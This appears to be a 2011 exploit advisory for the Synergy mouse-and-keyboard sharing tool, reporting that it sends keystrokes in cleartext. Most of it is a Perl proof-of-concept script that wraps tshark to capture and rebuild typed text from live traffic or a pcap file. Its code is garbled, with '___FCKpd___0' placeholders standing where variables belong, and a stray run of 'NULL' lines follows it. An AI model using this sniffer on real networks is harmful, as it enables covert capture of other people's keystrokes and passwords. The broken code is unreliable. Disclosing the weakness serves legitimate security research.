|
# Exploit Title: Synergy Protocol cleartext weakness PoC
# Date:April 5th 2011
# Author: Sw1tCh
# Software Link: http://synergy-foss.org/
# Version: 1.4
# -= Info =-
*Synergy* is *Free and Open Source Software* that lets you easily share your
mouse and keyboard between multiple computers, where each computer has it's
own display. No special hardware is required, all you need is a local area
network. Synergy is supported on Windows, Mac OS X and Linux. [Source =~
Synergy-foss.org]
#-= The Advisory =-
Synergy's sends all keystrokes and mouse movements in clear text. This
presents a huge vulnerability because if anyone is capturing packets on the
network, they could eavesdrop on all information passed between the multiple
computers.
# -= PoC Script =-
#!/usr/bin/perl
#
# synergyCap.pl - Developed by Sw1tCh to show the insecurity in Synergy
Deskop Sharing application
# The program works a lot better when through a closed network of one type
of another
# [such as an SSH tunnel]
# [Note: The text isn't clear. Because of the protocol, text is sent in TCP
and even with protocol
# Standards, text does come out of order.
##########################
#
# Obligatory Shouts -> gen0cide, Scruffy, Griff, D00dl3, BilboFraggin's
#
##########################
use constant BANNER => q{
/ / synergyCap -> Live or Forensic extractor of text
passeed
/ / from computers using Synergy Screen sharing
/ <( - )> /
/ / PoC Developed by Sw1tCh 2011
/ / -> Need to work on my tshark filters...My perl is
better :)
/ /
Softward -> Synergy - http://synergy-foss.org/
Usage:
- synergyCap.pl -forensic -file [FILE]
- synergyCap.pl -live -interface [device {example eth0} ]
};
# ----- INCLUDES ----- #
use strict;
use warnings;
use Getopt::Long;
use Switch;
use Time::HiRes qw( usleep sleep );
use Term::ANSIColor qw(:constants);
local $Term::ANSIColor::AUTORESET = 1;
print BOLD BLUE BANNER;
print "\n";
my $forensic = 0;
my $live = 0;
my $options = "";
my $capChar = "";
GetOptions (
'forensic' => \$forensic ,
'live' => \$live ,
'file' => \my $pcap_file ,
'interface' => \my $interface ,
);
unless ( $ARGV[0] ) { print "ERROR : Bad file or Interface\n"; exit; }
unless ( $live || $forensic ) { print "ERROR : No Option Specified [Live /
or / Forensic \n"; exit; }
if ( $live =~ m/1/ ) { $options = "i"; }
elsif ( $forensic =~ m/1/ ) { $options = "r"; }
open( TSHARK , "tshark -". $options . " " . $ARGV[0] ." -V |" ) or die
"Failed to open TSHARK: $!";
while( <TSHARK> )
{
if (___FCKpd___0
=~ /Key Id/) {
if( ___FCKpd___0
=~ s/Key Id\x3A\s//) {
if (___FCKpd___0
< 128){
print " " . chr(___FCKpd___0
) . "\n";
$capChar = $capChar. chr(___FCKpd___0
);
}
}
}
}
print "\n\n$capChar ";
print "\n---+ Completed +--- \n";
close( TSHARK );
#Credits: Sw1tCh
#Shoutouts : gen0cide, Scruffy, Griff, D00dl3, BilboFraggin's
--
NULL,
NULL NULL
NULL NULL NULL NULL NULL
NULL.NULL
(NULL) NULL - NULL
|
推荐
评论(0条)
